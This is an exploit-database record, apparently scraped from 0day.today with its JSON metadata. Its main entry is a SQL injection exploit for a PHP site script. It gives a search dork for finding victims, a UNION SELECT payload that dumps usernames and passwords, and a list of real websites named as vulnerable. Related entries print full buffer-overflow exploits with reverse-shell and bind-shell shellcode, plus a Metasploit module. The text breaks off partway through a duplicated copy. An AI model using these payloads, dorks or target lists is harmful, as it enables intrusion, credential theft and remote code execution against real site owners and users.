ID 1337DAY-ID-16702
Type zdt
Reporter Angel Injection
Modified 2011-08-17T00:00:00
Description
Exploit for php platform in category web applications
# Exploit Title:Precision Technologies(page.php)sql Injection Vulnerability
# Date: 17/8/2011
# Author: Angel Injection
# home Page: http://www.club-h.co.cc , http://www.sec-krb.org
# Email: Angel-Injection[at]hotmail.com
# Vendor or Software Link: http://www.pretechno.com
# Version: N/A
# Category:: webapps
# Google dork: intext:"powered by Precision Technologies" inurl:"page.php?id="
# Tested on: Back Track 5
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Exploit
http://localhost/page.php?id=1'
http://localhost/page.php?id=1[injection here]
http://www.localhost/page.php?id=-1+union+select+1,2,3,concat(uid,0x3a,username,0x3a,password),5,6,7,8,9,10+from+auth_user--
Demo sites
http://www.cibmrd.com/page.php?id=%27
http://www.nirmaltours.com/page.php?id=1%27
http://prakritiwomen.org/page.php?id=1
http://www.cardicareaipc.com/page.php?id=1%27
http://www.opaquegroup.com/page.php?id=1%27
http://synergy-pune.com/page.php?id=1%27
-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----
Thanks to all the people of Iraq And Club Hack Team
# 0day.today [2018-01-02] #
{"hash": "13e75e3e44f57cd40c9c5b2a0fc7ccd7e0b4e767061ab04d5038d3f6cc13f381", "id": "1337DAY-ID-16702", "lastseen": "2018-01-02T15:11:11", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "690d9db3ae63ffd6f45bb4e90e40feb8", "key": "href"}, {"hash": "0dfedf84e8a9988b87a4e7ecb8b9d410", "key": "modified"}, {"hash": "0dfedf84e8a9988b87a4e7ecb8b9d410", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "063fd817357f541bf662443325af39b8", "key": "reporter"}, {"hash": "7f5f6d74696e9cc21c02036b57303215", "key": "sourceData"}, {"hash": "e9803e767123e6c725d382e25aa6d5a0", "key": "sourceHref"}, {"hash": "e59a9991323c7e74eb5d2d1e4f2d2002", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2018-01-02T15:11:11"}, "dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:139468", "PACKETSTORM:83185"]}, {"type": "zdt", "idList": ["1337DAY-ID-26196", "1337DAY-ID-25670", "1337DAY-ID-17835", "1337DAY-ID-16370", "1337DAY-ID-8215", "1337DAY-ID-9179", "1337DAY-ID-1462"]}, {"type": "exploitdb", "idList": ["EDB-ID:40675", "EDB-ID:16702", "EDB-ID:3140", "EDB-ID:3127", "EDB-ID:1462", "EDB-ID:1448"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FTP/SAMI_FTPD_USER"]}, {"type": "cve", "idList": ["CVE-2006-0441"]}, {"type": "canvas", "idList": ["SAMIFTP"]}, {"type": "osvdb", "idList": ["OSVDB:22734"]}], "modified": "2018-01-02T15:11:11"}, "vulnersScore": 5.4}, "type": "zdt", "sourceHref": "https://0day.today/exploit/16702", "description": "Exploit for php platform in category web applications", "title": "Precision Technologies(page.php)sql Injection Vulnerability", "history": [{"bulletin": {"hash": "78a78cdc42a988cbfffed21d80031987b91ad3d9326d5dfb19e69f15a843adeb", "id": "1337DAY-ID-16702", "lastseen": "2016-04-19T01:43:21", "enchantments": {"score": {"value": 6.4, "modified": "2016-04-19T01:43:21"}}, "hashmap": [{"hash": "d19f3922d236744324f3e986d7f25e30", "key": "href"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "c12021b2e1bbd351fb41d3e36c09c84e", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e59a9991323c7e74eb5d2d1e4f2d2002", "key": "title"}, {"hash": "063fd817357f541bf662443325af39b8", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "0dfedf84e8a9988b87a4e7ecb8b9d410", "key": "modified"}, {"hash": "0dfedf84e8a9988b87a4e7ecb8b9d410", "key": "published"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "a880f11e2ef82d7191d49e77f81d07fa", "key": "sourceHref"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/16702", "description": "Exploit for php platform in category web applications", "viewCount": 0, "title": "Precision Technologies(page.php)sql Injection Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "# Exploit Title:Precision Technologies(page.php)sql Injection Vulnerability\r\n# Date: 17/8/2011\r\n# Author: Angel Injection\r\n# home Page: http://www.club-h.co.cc , http://www.sec-krb.org\r\n# Email: Angel-Injection[at]hotmail.com\r\n# Vendor or Software Link: http://www.pretechno.com\r\n# Version: N/A\r\n# Category:: webapps\r\n# Google dork: intext:\"powered by Precision Technologies\" inurl:\"page.php?id=\"\r\n# Tested on: Back Track 5\r\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\nExploit\r\n\r\nhttp://localhost/page.php?id=1'\r\n\r\nhttp://localhost/page.php?id=1[injection here]\r\n\r\nhttp://www.localhost/page.php?id=-1+union+select+1,2,3,concat(uid,0x3a,username,0x3a,password),5,6,7,8,9,10+from+auth_user--\r\n\r\nDemo sites\r\nhttp://www.cibmrd.com/page.php?id=%27\r\nhttp://www.nirmaltours.com/page.php?id=1%27\r\nhttp://prakritiwomen.org/page.php?id=1\r\nhttp://www.cardicareaipc.com/page.php?id=1%27\r\nhttp://www.opaquegroup.com/page.php?id=1%27\r\nhttp://synergy-pune.com/page.php?id=1%27\r\n\r\n\r\n-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----\r\nThanks to all the people of Iraq And Club Hack Team\r\n\r\n\n\n# 0day.today [2016-04-19] #", "published": "2011-08-17T00:00:00", "references": [], "reporter": "Angel Injection", "modified": "2011-08-17T00:00:00", "href": "http://0day.today/exploit/description/16702"}, "lastseen": "2016-04-19T01:43:21", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "# Exploit Title:Precision Technologies(page.php)sql Injection Vulnerability\r\n# Date: 17/8/2011\r\n# Author: Angel Injection\r\n# home Page: http://www.club-h.co.cc , http://www.sec-krb.org\r\n# Email: Angel-Injection[at]hotmail.com\r\n# Vendor or Software Link: http://www.pretechno.com\r\n# Version: N/A\r\n# Category:: webapps\r\n# Google dork: intext:\"powered by Precision Technologies\" inurl:\"page.php?id=\"\r\n# Tested on: Back Track 5\r\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\nExploit\r\n\r\nhttp://localhost/page.php?id=1'\r\n\r\nhttp://localhost/page.php?id=1[injection here]\r\n\r\nhttp://www.localhost/page.php?id=-1+union+select+1,2,3,concat(uid,0x3a,username,0x3a,password),5,6,7,8,9,10+from+auth_user--\r\n\r\nDemo sites\r\nhttp://www.cibmrd.com/page.php?id=%27\r\nhttp://www.nirmaltours.com/page.php?id=1%27\r\nhttp://prakritiwomen.org/page.php?id=1\r\nhttp://www.cardicareaipc.com/page.php?id=1%27\r\nhttp://www.opaquegroup.com/page.php?id=1%27\r\nhttp://synergy-pune.com/page.php?id=1%27\r\n\r\n\r\n-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----\r\nThanks to all the people of Iraq And Club Hack Team\r\n\r\n\n\n# 0day.today [2018-01-02] #", "published": "2011-08-17T00:00:00", "references": [], "reporter": "Angel Injection", "modified": "2011-08-17T00:00:00", "href": "https://0day.today/exploit/description/16702"}
{"packetstorm": [{"lastseen": "2019-12-07T02:20:37", "bulletinFamily": "exploit", "description": "", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "PACKETSTORM:155578", "href": "https://packetstormsecurity.com/files/155578/Integard-Pro-NoJs-2.2.0.9026-Remote-Buffer-Overflow.html", "title": "Integard Pro NoJs 2.2.0.9026 Remote Buffer Overflow", "type": "packetstorm", "sourceData": "`Exploit Title: Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow \nDate: 2019-09-22 \nExploit Author: purpl3f0xsecur1ty \nVendor Homepage: https://www.tucows.com/ \nSoftware Link: http://www.tucows.com/preview/519612/Integard-Home \nVersion: Pro 2.2.0.9026 / Home 2.0.0.9021 \nTested on: Windows XP / Win7 / Win10 \nCVE: CVE-2019-16702 \n \n#!/usr/bin/python \n######################################################## \n#~Integard Pro 2.2.0.9026 \"NoJs\" EIP overwrite exploit~# \n#~~~~~~~~~~~~~~~~Authored by purpl3f0x~~~~~~~~~~~~~~~~~# \n# The vulnerability: Integard fails to sanitize input # \n# to the \"NoJs\" parameter in an HTTP POST request, # \n# resulting in a stack buffer overflow that overwrites # \n# the instruction pointer, leading to remote code # \n# execution. # \n######################################################## \n \nimport socket \nimport os \nimport sys \nfrom struct import pack \n \ndef main(): \nprint \"~*Integard RCE Exploit for XP/7/10*~\" \nprint \"Chose target: (Enter number only)\" \nprint \"1) - Windows XP\" \nprint \"2) - Windows 7/10\" \ntarget = str(input()) \nhost = \"10.0.0.130\" \nport = 18881 \n \n#################################################### \n# Integard's functionality interferes with reverse # \n# and bind shells. Only Meterpreter seems to work. # \n#################################################### \n \n# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=9001 \n# -b \"\\x00\\x26\\x2f\\x3d\\x3f\\x5c\" -f python -v meterpreter EXITFUNC=thread \nmeterpreter = \"\\x90\" * 50 \nmeterpreter += \"\\xda\\xcd\\xbe\\xa2\\x51\\xce\\x97\\xd9\\x74\\x24\\xf4\" \nmeterpreter += \"\\x5f\\x2b\\xc9\\xb1\\x5b\\x83\\xef\\xfc\\x31\\x77\\x15\" \nmeterpreter += \"\\x03\\x77\\x15\\x40\\xa4\\x32\\x7f\\x06\\x47\\xcb\\x80\" \nmeterpreter += \"\\x66\\xc1\\x2e\\xb1\\xa6\\xb5\\x3b\\xe2\\x16\\xbd\\x6e\" \nmeterpreter += \"\\x0f\\xdd\\x93\\x9a\\x84\\x93\\x3b\\xac\\x2d\\x19\\x1a\" \nmeterpreter += \"\\x83\\xae\\x31\\x5e\\x82\\x2c\\x4b\\xb3\\x64\\x0c\\x84\" \nmeterpreter += \"\\xc6\\x65\\x49\\xf8\\x2b\\x37\\x02\\x77\\x99\\xa8\\x27\" \nmeterpreter += \"\\xcd\\x22\\x42\\x7b\\xc0\\x22\\xb7\\xcc\\xe3\\x03\\x66\" \nmeterpreter += \"\\x46\\xba\\x83\\x88\\x8b\\xb7\\x8d\\x92\\xc8\\xfd\\x44\" \nmeterpreter += \"\\x28\\x3a\\x8a\\x56\\xf8\\x72\\x73\\xf4\\xc5\\xba\\x86\" \nmeterpreter += \"\\x04\\x01\\x7c\\x78\\x73\\x7b\\x7e\\x05\\x84\\xb8\\xfc\" \nmeterpreter += \"\\xd1\\x01\\x5b\\xa6\\x92\\xb2\\x87\\x56\\x77\\x24\\x43\" \nmeterpreter += \"\\x54\\x3c\\x22\\x0b\\x79\\xc3\\xe7\\x27\\x85\\x48\\x06\" \nmeterpreter += \"\\xe8\\x0f\\x0a\\x2d\\x2c\\x4b\\xc9\\x4c\\x75\\x31\\xbc\" \nmeterpreter += \"\\x71\\x65\\x9a\\x61\\xd4\\xed\\x37\\x76\\x65\\xac\\x5f\" \nmeterpreter += \"\\xbb\\x44\\x4f\\xa0\\xd3\\xdf\\x3c\\x92\\x7c\\x74\\xab\" \nmeterpreter += \"\\x9e\\xf5\\x52\\x2c\\x96\\x11\\x65\\xe2\\x10\\x71\\x9b\" \nmeterpreter += \"\\x03\\x61\\x58\\x58\\x57\\x31\\xf2\\x49\\xd8\\xda\\x02\" \nmeterpreter += \"\\x75\\x0d\\x76\\x08\\xe1\\xa4\\x87\\x0c\\x71\\xd0\\x85\" \nmeterpreter += \"\\x0c\\x52\\x08\\x03\\xea\\xc4\\x1a\\x43\\xa2\\xa4\\xca\" \nmeterpreter += \"\\x23\\x12\\x4d\\x01\\xac\\x4d\\x6d\\x2a\\x66\\xe6\\x04\" \nmeterpreter += \"\\xc5\\xdf\\x5f\\xb1\\x7c\\x7a\\x2b\\x20\\x80\\x50\\x56\" \nmeterpreter += \"\\x62\\x0a\\x51\\xa7\\x2d\\xfb\\x10\\xbb\\x5a\\x9c\\xda\" \nmeterpreter += \"\\x43\\x9b\\x09\\xdb\\x29\\x9f\\x9b\\x8c\\xc5\\x9d\\xfa\" \nmeterpreter += \"\\xfb\\x4a\\x5d\\x29\\x78\\x8c\\xa1\\xac\\x49\\xe7\\x94\" \nmeterpreter += \"\\x3a\\xf6\\x9f\\xd8\\xaa\\xf6\\x5f\\x8f\\xa0\\xf6\\x37\" \nmeterpreter += \"\\x77\\x91\\xa4\\x22\\x78\\x0c\\xd9\\xff\\xed\\xaf\\x88\" \nmeterpreter += \"\\xac\\xa6\\xc7\\x36\\x8b\\x81\\x47\\xc8\\xfe\\x91\\x80\" \nmeterpreter += \"\\x36\\x7d\\xbe\\x28\\x5f\\x7d\\xfe\\xc8\\x9f\\x17\\xfe\" \nmeterpreter += \"\\x98\\xf7\\xec\\xd1\\x17\\x38\\x0d\\xf8\\x7f\\x50\\x84\" \nmeterpreter += \"\\x6d\\xcd\\xc1\\x99\\xa7\\x93\\x5f\\x9a\\x44\\x08\\x6f\" \nmeterpreter += \"\\xe1\\x25\\xaf\\x90\\x16\\x2c\\xd4\\x90\\x17\\x50\\xea\" \nmeterpreter += \"\\xad\\xce\\x69\\x98\\xf0\\xd3\\xcd\\x83\\xee\\xf9\\x3b\" \nmeterpreter += \"\\x2c\\xb7\\x68\\x86\\x31\\x48\\x47\\xc5\\x4f\\xcb\\x6d\" \nmeterpreter += \"\\xb6\\xab\\xd3\\x04\\xb3\\xf0\\x53\\xf5\\xc9\\x69\\x36\" \nmeterpreter += \"\\xf9\\x7e\\x89\\x13\" \n \nif target == \"1\": \nprint \"[*] Sending Windows XP payload using meterpreter/reverse_tcp\" \n# JMP ESP at 0x3E087557 in iertutil.dll \ncrash = \"A\" * 512 \ncrash += pack(\"<L\",0x3E087557) \ncrash += meterpreter \ncrash += \"C\" * (1500 - len(crash)) \n \nbuffer = \"\" \nbuffer += \"POST /LoginAdmin HTTP/1.1\\r\\n\" \nbuffer += \"Host: 10.0.0.130:18881\\r\\n\" \nbuffer += \"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\\r\\n\" \nbuffer += \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\" \nbuffer += \"Accept-Language: en-US,en;q=0.5\\r\\n\" \nbuffer += \"Accept-Encoding: gzip, deflate\\r\\n\" \nbuffer += \"Referer: http://10.0.0.130:18881/\\r\\n\" \nbuffer += \"Connection: close\\r\\n\" \nbuffer += \"Upgrade-Insecure-Requests: 1\\r\\n\" \nbuffer += \"Content-Type: application/x-www-form-urlencoded\\r\\n\" \nbuffer += \"Content-Length: 78\\r\\n\\r\\n\" \nbuffer += \"Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=\" + crash + \"&LoginButtonName=Login\\r\\n\" \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect((host,port)) \ns.send(buffer) \ns.close() \nprint \"[*] Done\" \n \nif target == \"2\": \nprint \"[*] Sending Windows 7/10 payload using meterpreter/reverse_tcp\" \n \n# ASLR IS ON!!! MUST USE NON-ASLR MODULE! \n# POP POP RET in integard.exe (ASLR disabled) \nnSEH = \"\\xEB\\xD0\\x90\\x90\" # Jump 48 bytes backwards \nSEH = pack(\"<L\",0x004042B0) \n \njumpCall = \"\\xEB\\x09\" # Jump 11 bytes forward to hit the CALL in bigBackJump \nbigBackJump = \"\\x59\\xFE\\xCD\\xFE\\xCD\\xFE\\xCD\\xFF\\xE1\\xE8\\xF2\\xFF\\xFF\\xFF\" \n \ncrash = \"\\x90\" * (2776 -len(jumpCall) - len(bigBackJump) - len(meterpreter) - 50) \ncrash += meterpreter \ncrash += \"\\x90\" * 50 \ncrash += jumpCall \ncrash += bigBackJump \ncrash += nSEH \ncrash += SEH \n \n \nbuffer = \"\" \nbuffer += \"POST /LoginAdmin HTTP/1.1\\r\\n\" \nbuffer += \"Host: 10.0.0.130:18881\\r\\n\" \nbuffer += \"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\\r\\n\" \nbuffer += \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\" \nbuffer += \"Accept-Language: en-US,en;q=0.5\\r\\n\" \nbuffer += \"Accept-Encoding: gzip, deflate\\r\\n\" \nbuffer += \"Referer: http://10.0.0.130:18881/\\r\\n\" \nbuffer += \"Connection: close\\r\\n\" \nbuffer += \"Upgrade-Insecure-Requests: 1\\r\\n\" \nbuffer += \"Content-Type: application/x-www-form-urlencoded\\r\\n\" \nbuffer += \"Content-Length: 78\\r\\n\\r\\n\" \nbuffer += \"Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=\" + crash + \"&LoginButtonName=Login\\r\\n\" \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect((host,port)) \ns.send(buffer) \ns.close() \nprint \"[*] Done\" \n \nmain() \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/155578/integardpronojs2209026-overflow.txt"}, {"lastseen": "2016-12-05T22:17:22", "bulletinFamily": "exploit", "description": "", "modified": "2016-11-01T00:00:00", "published": "2016-11-01T00:00:00", "id": "PACKETSTORM:139468", "href": "https://packetstormsecurity.com/files/139468/KarjaSoft-Sami-FTP-Server-2.0.2-Buffer-Overflow.html", "title": "KarjaSoft Sami FTP Server 2.0.2 Buffer Overflow", "type": "packetstorm", "sourceData": "`#/usr/bin/python \n#-*- Coding: utf-8 -*- \n \n### Sami FTP Server 2.0.2- SEH Overwrite, Buffer Overflow by n30m1nd ### \n \n# Date: 2016-01-11 \n# Exploit Author: n30m1nd \n# Vendor Homepage: http://www.karjasoft.com/ \n# Software Link: http://www.karjasoft.com/files/samiftp/samiftpd_install.exe \n# Version: 2.0.2 \n# Tested on: Win7 64bit and Win10 64 bit \n \n# Credits \n# ======= \n# Thanks to PHRACK for maintaining all the articles up for so much time... \n# These are priceless and still current for exploit development!! \n# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better \n \n# How to \n# ====== \n# * Open Sami FTP Server and open its graphical interface \n# * Run this python script and write the IP to attack \n# * Connect to the same IP on port 4444 \n# \n# BONUS \n# ===== \n# Since the program will write the data into its (SamiFTP.binlog) logs it will try to load these logs on each \n# start and so, it will crash and run our shellcode everytime it starts. \n \n# Why? \n# ==== \n# The graphical interface tries to show the user name which produces an overflow overwriting SEH \n \n# Exploit code \n# ============ \n \nimport socket \nimport struct \n \ndef doHavoc(ipaddr): \n# Bad chars: 00 0d 0a ff \nalignment = \"\\x90\"*3 \n \njmpfront = \"345A7504\".decode('hex') \n#CPU Disasm \n#Hex dump Command \n# 34 5A XOR AL,5A \n# 75 04 JNE SHORT +04 \n \n# pop pop ret in tmp01.dll \npopret = 0x10022ADE \n \n# fstenv trick to get eip: phrack number 62 \n# and store it into EAX for the metasploit shell (BufferRegister) \ngetEIPinEAX = \"D9EED934E48B44E40C040b\".decode('hex') \n#CPU Disasm \n#Hex dump Command \n# D9EE FLDZ \n# D934E4 FSTENV SS:[ESP] \n# 8B44E4 0C MOV EAX,DWORD PTR SS:[ESP+0C] \n# 04 0B ADD AL,0B \n \n# Bind shellcode on port 4444 - alpha mixed BufferRegister=EAX \nshellcode = ( \ngetEIPinEAX + \n\"PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylm8mRS0UP7p\" \n\"e0K9jEDqYPU4Nk60VPlKCbdLnkbrWdLKqb4hfoNWczEvdqyoNLElpaalC2dl10kq\" \n\"xO6mEQ9WxbjRf22wNkf220lKsz5lNkblr1sHxcsxGqZqcaLK0YQ05QiCNkCyB8Hc\" \n\"VZ1Ynk5dlKEQyF01IoNLYQHOvm31yW6X9pRUXvwsSMIhgKqmDdT5KTf8NkaHWTEQ\" \n\"yCavNkDLBklKbx7lgqN3nkC4nkuQXPk9w47Tq4skaKsQV9pZPQkOYpcosobzNkWb\" \n\"8kNmSmbH5cP2C0Wpu8Qgd3UbCof4e80LD7ev379oyElxlP31GpWpFIo4V4bpCXa9\" \n\"op2KePyohURJFhPY0P8bimw0pPG0rpu8xjDOYOipYoiEj7QxWrC0wa3lmYZFbJDP\" \n\"qFqGCXYRIKDw3WkOZuv7CXNWkYehKOkOiEaGPhD4HlwKm1KOhUQGJ7BHRUpnrmqq\" \n\"Iokee83S2McT30oyXcQGV767FQIfcZfrv9PVYrImQvKwG4DdelvaGqLM0D5tDPO6\" \n\"GpRd0T602vaFF6w666rnqFsf2sPV0h2YzleoovYoXUK9kPrnSfPFYo00Ph7xk7wm\" \n\"sPYoKeMkxplulb2vsXoVmEOMomKO9EgL4FCLFjk0YkM0qec5Mkg7FsD2ROqzGpv3\" \n\"ioJuAA\" \n) \n \n# Final payload, SEH overwrite ocurrs at 600 bytes \npayload = alignment + \".\"*(600-len(alignment)-len(jmpfront)) + jmpfront + struct.pack(\"<L\", popret) + shellcode \ntry: \ns = socket.create_connection((ipaddr, 21)) \ns.send(\"USER \"+ payload +\"\\r\\n\" ) \nprint s.recv(4096) \n \ns.send(\"PASS \"+ payload +\"\\r\\n\" ) \nprint s.recv(4096) \nprint s.recv(4096) \nexcept e: \nprint str(e) \nexit(\"[+] Couldn't connect\") \n \nif __name__ == \"__main__\": \nipaddr = raw_input(\"[+] IP: \") \ndoHavoc(ipaddr) \nwhile raw_input(\"[?] Got shell?(y/n) \").lower() == \"n\": \ndoHavoc(ipaddr) \nprint \"[+] Enjoy...\" \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/139468/karjasoftsamiftp-overflow.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:14:58", "bulletinFamily": "exploit", "description": "", "modified": "2009-11-26T00:00:00", "published": "2009-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/83185/KarjaSoft-Sami-FTP-Server-v2.02-USER-Overflow.html", "id": "PACKETSTORM:83185", "type": "packetstorm", "title": "KarjaSoft Sami FTP Server v2.02 USER Overflow", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'KarjaSoft Sami FTP Server v2.02 USER Overflow', \n'Description' => %q{ \nThis module exploits the KarjaSoft Sami FTP Server version 2.02 \nby sending an excessively long USER string. The stack is overwritten \nwhen the administrator attempts to view the FTP logs. Therefore, this exploit \nis passive and requires end-user interaction. Keep this in mind when selecting \npayloads. When the server is restarted, it will re-execute the exploit until \nthe logfile is manually deleted via the file system. \n}, \n'Author' => [ 'patrick' ], \n'Arch' => [ ARCH_X86 ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'Stance' => Msf::Exploit::Stance::Passive, \n'References' => \n[ \n# This exploit appears to have been reported multiple times. \n[ 'CVE', '2006-0441'], \n[ 'CVE', '2006-2212'], \n[ 'OSVDB', '25670'], \n[ 'BID', '16370'], \n[ 'BID', '22045'], \n[ 'BID', '17835'], \n[ 'URL', 'http://www.milw0rm.com/exploits/1448'], \n[ 'URL', 'http://www.milw0rm.com/exploits/1452'], \n[ 'URL', 'http://www.milw0rm.com/exploits/1462'], \n[ 'URL', 'http://www.milw0rm.com/exploits/3127'], \n[ 'URL', 'http://www.milw0rm.com/exploits/3140'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'seh', \n}, \n'Platform' => ['win'], \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 300, \n'BadChars' => \"\\x00\\x0a\\x0d\\x20\\xff\", \n'StackAdjustment' => -3500, \n}, \n'Targets' => \n[ \n[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll \n[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd11a9 } ], # p/p/r ws2help.dll \n[ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa12bc } ], # p/p/r ws2help.dll \n[ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa32ad } ], # p/p/r ws2help.dll \n], \n'DisclosureDate' => 'Jan 24 2006')) \n \nregister_options( \n[ \nOpt::RPORT(21), \n], self.class) \nend \n \ndef check \nconnect \nbanner = sock.get(-1,3) \ndisconnect \n \nif (banner =~ /Sami FTP Server 2.0.2/) \nreturn Exploit::CheckCode::Vulnerable \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nconnect \n \nsploit = Rex::Text.rand_text_alphanumeric(596) + generate_seh_payload(target.ret) \n \nlogin = \"USER #{sploit}\\r\\n\" \nlogin << \"PASS \" + Rex::Text.rand_char(payload_badchars) \n \nsock.put(login + \"\\r\\n\") \n \nhandler \ndisconnect \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/83185/sami_ftpd_user.rb.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2019-12-06T16:00:32", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2019-12-06T00:00:00", "published": "2019-12-06T00:00:00", "id": "1337DAY-ID-33629", "href": "https://0day.today/exploit/description/33629", "title": "Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow Exploit", "type": "zdt", "sourceData": "Exploit Title: Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow\r\nExploit Author: purpl3f0xsecur1ty\r\nVendor Homepage: https://www.tucows.com/\r\nSoftware Link: http://www.tucows.com/preview/519612/Integard-Home\r\nVersion: Pro 2.2.0.9026 / Home 2.0.0.9021\r\nTested on: Windows XP / Win7 / Win10\r\nCVE: CVE-2019-16702\r\n\r\n#!/usr/bin/python\r\n########################################################\r\n#~Integard Pro 2.2.0.9026 \"NoJs\" EIP overwrite exploit~#\r\n#~~~~~~~~~~~~~~~~Authored by purpl3f0x~~~~~~~~~~~~~~~~~#\r\n# The vulnerability: Integard fails to sanitize input #\r\n# to the \"NoJs\" parameter in an HTTP POST request, #\r\n# resulting in a stack buffer overflow that overwrites #\r\n# the instruction pointer, leading to remote code #\r\n# execution. #\r\n########################################################\r\n\r\nimport socket\r\nimport os\r\nimport sys\r\nfrom struct import pack\r\n\r\ndef main():\r\n print \"~*Integard RCE Exploit for XP/7/10*~\"\r\n print \"Chose target: (Enter number only)\"\r\n print \"1) - Windows XP\"\r\n print \"2) - Windows 7/10\"\r\n target = str(input())\r\n host = \"10.0.0.130\"\r\n port = 18881\r\n\r\n ####################################################\r\n # Integard's functionality interferes with reverse #\r\n # and bind shells. Only Meterpreter seems to work. #\r\n ####################################################\r\n\r\n # msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=9001\r\n # -b \"\\x00\\x26\\x2f\\x3d\\x3f\\x5c\" -f python -v meterpreter EXITFUNC=thread\r\n meterpreter = \"\\x90\" * 50\r\n meterpreter += \"\\xda\\xcd\\xbe\\xa2\\x51\\xce\\x97\\xd9\\x74\\x24\\xf4\"\r\n meterpreter += \"\\x5f\\x2b\\xc9\\xb1\\x5b\\x83\\xef\\xfc\\x31\\x77\\x15\"\r\n meterpreter += \"\\x03\\x77\\x15\\x40\\xa4\\x32\\x7f\\x06\\x47\\xcb\\x80\"\r\n meterpreter += \"\\x66\\xc1\\x2e\\xb1\\xa6\\xb5\\x3b\\xe2\\x16\\xbd\\x6e\"\r\n meterpreter += \"\\x0f\\xdd\\x93\\x9a\\x84\\x93\\x3b\\xac\\x2d\\x19\\x1a\"\r\n meterpreter += \"\\x83\\xae\\x31\\x5e\\x82\\x2c\\x4b\\xb3\\x64\\x0c\\x84\"\r\n meterpreter += \"\\xc6\\x65\\x49\\xf8\\x2b\\x37\\x02\\x77\\x99\\xa8\\x27\"\r\n meterpreter += \"\\xcd\\x22\\x42\\x7b\\xc0\\x22\\xb7\\xcc\\xe3\\x03\\x66\"\r\n meterpreter += \"\\x46\\xba\\x83\\x88\\x8b\\xb7\\x8d\\x92\\xc8\\xfd\\x44\"\r\n meterpreter += 